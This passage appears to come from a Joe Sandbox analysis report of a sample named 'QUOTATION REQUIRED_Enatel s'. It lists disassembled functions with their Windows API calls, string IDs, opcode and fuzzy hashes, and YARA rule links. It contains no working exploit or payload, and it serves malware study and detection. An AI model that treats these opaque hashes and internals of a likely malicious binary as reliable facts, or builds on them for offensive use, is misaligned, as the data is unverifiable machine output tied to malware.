                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 4099089115-3080491070
                                                                                                                    • Opcode ID: 053a58b7fb703e1d5c6eb5f402dfa044065c81477db1dc8e0d1a6e2308dee297
                                                                                                                    • Instruction ID: 2692307d57edf32ec1436b688cc34cd218fa2824298c51ab6c806d3df3162415
                                                                                                                    • Opcode Fuzzy Hash: 053a58b7fb703e1d5c6eb5f402dfa044065c81477db1dc8e0d1a6e2308dee297
                                                                                                                    • Instruction Fuzzy Hash: 4951B371C0020AAADF14EBA0DD42EEEB379AF04740F144066F505B2161EB796F98FB61
                                                                                                                    Function 00F7B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 1256254125-769500911
                                                                                                                    • Opcode ID: 4ca3a491c1a7657c115504904de9990e213366f8e9aa9614be9d5f2fe7f01942
                                                                                                                    • Instruction ID: f1f50f1d8d44656d90cf8beda60bb62c31ec6678e1d561518d252bff0dbd4ef0
                                                                                                                    • Opcode Fuzzy Hash: 4ca3a491c1a7657c115504904de9990e213366f8e9aa9614be9d5f2fe7f01942
                                                                                                                    • Instruction Fuzzy Hash: 87412B32E0002A9BCB105F7DCC907BE77A1AF62774B24816BE629D7284E735CD81E791
                                                                                                                    Function 00F85393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F853A0
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F85416
                                                                                                                    • GetLastError.KERNEL32 ref: 00F85420
                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F854A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 36fc99c8e529513dd42fdcdae63c65f8dadf23f363f48acd03f29ce50d8ee4cd
                                                                                                                    • Instruction ID: 42f97ba918a4bc2e8a3441be12fcbce5e61a54d4c28cec2af4f34f738638d399
                                                                                                                    • Opcode Fuzzy Hash: 36fc99c8e529513dd42fdcdae63c65f8dadf23f363f48acd03f29ce50d8ee4cd
                                                                                                                    • Instruction Fuzzy Hash: 7131CE75A002049FDB10EF68C894BEABBB5EF45715F188066E405CB392DB71ED82EB90
                                                                                                                    Function 00FA3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateMenu.USER32 ref: 00FA3C79
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00FA3C88
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA3D10
                                                                                                                    • IsMenu.USER32(?), ref: 00FA3D24
                                                                                                                    • CreatePopupMenu.USER32 ref: 00FA3D2E
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA3D5B
                                                                                                                    • DrawMenuBar.USER32 ref: 00FA3D63
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 161812096-3044882817
                                                                                                                    • Opcode ID: 60fb384dff5ee55b9aaaa869f3cadb45d3c0d699147767ee63f8051ec6da3bfe
                                                                                                                    • Instruction ID: 6ec3d12110354ffb4bf51d2ed8593c3bb97b76de9ef760408f1aff4b28868d5c
                                                                                                                    • Opcode Fuzzy Hash: 60fb384dff5ee55b9aaaa869f3cadb45d3c0d699147767ee63f8051ec6da3bfe
                                                                                                                    • Instruction Fuzzy Hash: 94412CB5A01209EFDB14CF65D884AEA7BF5FF4A360F140029F946A7360D771AA10EF94
                                                                                                                    Function 00F71EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F73CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00F73CCA
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F71F64
                                                                                                                    • GetDlgCtrlID.USER32 ref: 00F71F6F
                                                                                                                    • GetParent.USER32 ref: 00F71F8B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F71F8E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00F71F97
                                                                                                                    • GetParent.USER32(?), ref: 00F71FAB
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F71FAE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                    • Opcode ID: d03d0b54182220f32808d1c729d5db004ad2cf3913d139ba82619c1c98aa0103
                                                                                                                    • Instruction ID: c65171eddec61e28ab29ab3766557e58e09644b67d2b935a27f8c17ed24f9311
                                                                                                                    • Opcode Fuzzy Hash: d03d0b54182220f32808d1c729d5db004ad2cf3913d139ba82619c1c98aa0103
                                                                                                                    • Instruction Fuzzy Hash: 4B21F275D00218BBCF11EFA4CC85EEEBBB8EF06350B004106F96963291CB785908FBA1
                                                                                                                    Function 00FA3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FA3A9D
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FA3AA0
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA3AC7
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA3AEA
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FA3B62
                                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FA3BAC
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FA3BC7
                                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FA3BE2
                                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FA3BF6
                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FA3C13
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: 11d41af3b5a41cef9458f4769af9a74e78f348b4196e2948f1a14535a42d4487
                                                                                                                    • Instruction ID: 1222fc9026a4e604a5fd9e090c031b9ac4b4032fc562c5c9ae34ad81929af061
                                                                                                                    • Opcode Fuzzy Hash: 11d41af3b5a41cef9458f4769af9a74e78f348b4196e2948f1a14535a42d4487
                                                                                                                    • Instruction Fuzzy Hash: 3C616DB5900248AFDB10DF64CC81EEE77F8EF49710F104159FA15A7291D774AE45EB60
                                                                                                                    Function 00F7B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00F7B151
                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B165
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00F7B16C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B17B
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F7B18D
                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1A6
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1B8
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B1FD
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B212
                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F7A1E1,?,00000001), ref: 00F7B21D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: 2b66953516b97643abfe7d5568284e63b54a7bdb2435018a56a5fcb05043c3f0
                                                                                                                    • Instruction ID: 3870d3705b660a1b085a29802e778df11fa02e33e04fe26189388608cf1499ea
                                                                                                                    • Opcode Fuzzy Hash: 2b66953516b97643abfe7d5568284e63b54a7bdb2435018a56a5fcb05043c3f0
                                                                                                                    • Instruction Fuzzy Hash: 613152B590020CAFDB119F64EC8CB6D7B6AAB52325F108416FA09DB251D7B49E40EF61
                                                                                                                    Function 00F42C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F42C94
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F42CA0
                                                                                                                    • _free.LIBCMT ref: 00F42CAB
                                                                                                                    • _free.LIBCMT ref: 00F42CB6
                                                                                                                    • _free.LIBCMT ref: 00F42CC1
                                                                                                                    • _free.LIBCMT ref: 00F42CCC
                                                                                                                    • _free.LIBCMT ref: 00F42CD7
                                                                                                                    • _free.LIBCMT ref: 00F42CE2
                                                                                                                    • _free.LIBCMT ref: 00F42CED
                                                                                                                    • _free.LIBCMT ref: 00F42CFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 2337b247769be4598e2d75ca982d5684056cd83d57d1d353aa74cbeb1278ca71
                                                                                                                    • Instruction ID: 50d89c94f672c55486e5a8f1f38975aac1ef9fe930be2da2c9424129e5a29290
                                                                                                                    • Opcode Fuzzy Hash: 2337b247769be4598e2d75ca982d5684056cd83d57d1d353aa74cbeb1278ca71
                                                                                                                    • Instruction Fuzzy Hash: 1B119276500108AFDB82EF59DC82CDD3FB5FF05350F9144A5FA489B222DA35EA50BB90
                                                                                                                    Function 00F11410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F11459
                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00F114F8
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00F116DD
                                                                                                                    • DestroyWindow.USER32(?), ref: 00F524B9
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00F5251E
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F5254B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                    • Opcode ID: 38ce89d782146164af42b7cd12d843ed8583e7c78766566613b373861a0d3948
                                                                                                                    • Instruction ID: d365b8062d66e0158282e28843e69154f23b369d829c24d3ad0afc033ed68b9c
                                                                                                                    • Opcode Fuzzy Hash: 38ce89d782146164af42b7cd12d843ed8583e7c78766566613b373861a0d3948
                                                                                                                    • Instruction Fuzzy Hash: F0D1D531701212CFCB19EF14C895B69F7A0BF06711F1442ADEA4A6B252DB31EC56EF91
                                                                                                                    Function 00F87DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F87FAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F87FC1
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F87FEB
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F88005
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88017
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F88060
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F880B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 769691225-438819550
                                                                                                                    • Opcode ID: bf5d729aad3b10327ecd31261d7c0aee4d94d72680356fa375f67ef3511965e6
                                                                                                                    • Instruction ID: 51c55b71b6b35d3c329c2ca4d2d4b92c7303e0cf8a73c2396559902d16b83e78
                                                                                                                    • Opcode Fuzzy Hash: bf5d729aad3b10327ecd31261d7c0aee4d94d72680356fa375f67ef3511965e6
                                                                                                                    • Instruction Fuzzy Hash: BE81B3729083459BCB20FF14C844AEAB7E8BF85360F64485EF489C7250DB74DD45AB92
                                                                                                                    Function 00F15BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00F15C7A
                                                                                                                      • Part of subcall function 00F15D0A: GetClientRect.USER32(?,?), ref: 00F15D30
                                                                                                                      • Part of subcall function 00F15D0A: GetWindowRect.USER32(?,?), ref: 00F15D71
                                                                                                                      • Part of subcall function 00F15D0A: ScreenToClient.USER32(?,?), ref: 00F15D99
                                                                                                                    • GetDC.USER32 ref: 00F546F5
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F54708
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F54716
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F5472B
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F54733
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F547C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: 0c865bc0d30626c0bb98891d74ef05b6497d8fe41ff9051002a36d34635f9d95
                                                                                                                    • Instruction ID: 0d58f731dd47426bdb570cab8a0eae3313b0473fb61617af4f35eb6e879134e2
                                                                                                                    • Opcode Fuzzy Hash: 0c865bc0d30626c0bb98891d74ef05b6497d8fe41ff9051002a36d34635f9d95
                                                                                                                    • Instruction Fuzzy Hash: 8B71F535900209DFCF218F64D984AFA7BB1FF4A32AF144265EE555A266C730A8C5FF90
                                                                                                                    Function 00F8359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00F835E4
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                    • LoadStringW.USER32(00FE2390,?,00000FFF,?), ref: 00F8360A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString$_wcslen
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 4099089115-2391861430
                                                                                                                    • Opcode ID: 58ad523359518914ed3de38eb5e15c737ef7665dfc7c39acbfba28fa29b1c722
                                                                                                                    • Instruction ID: be97b96756309282af49035d2fd66add8d5db7791ed5c93c3df80b46e70d8bb2
                                                                                                                    • Opcode Fuzzy Hash: 58ad523359518914ed3de38eb5e15c737ef7665dfc7c39acbfba28fa29b1c722
                                                                                                                    • Instruction Fuzzy Hash: 89518E72C0421ABADF14EBA0CC42EEDBB39AF04710F044125F505721A1EB746AD8FFA1
                                                                                                                    Function 00FA8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                      • Part of subcall function 00F2912D: GetCursorPos.USER32(?), ref: 00F29141
                                                                                                                      • Part of subcall function 00F2912D: ScreenToClient.USER32(00000000,?), ref: 00F2915E
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000001), ref: 00F29183
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000002), ref: 00F2919D
                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FA8B6B
                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00FA8B71
                                                                                                                    • ReleaseCapture.USER32 ref: 00FA8B77
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00FA8C12
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FA8C25
                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FA8CFF
                                                                                                                    Strings
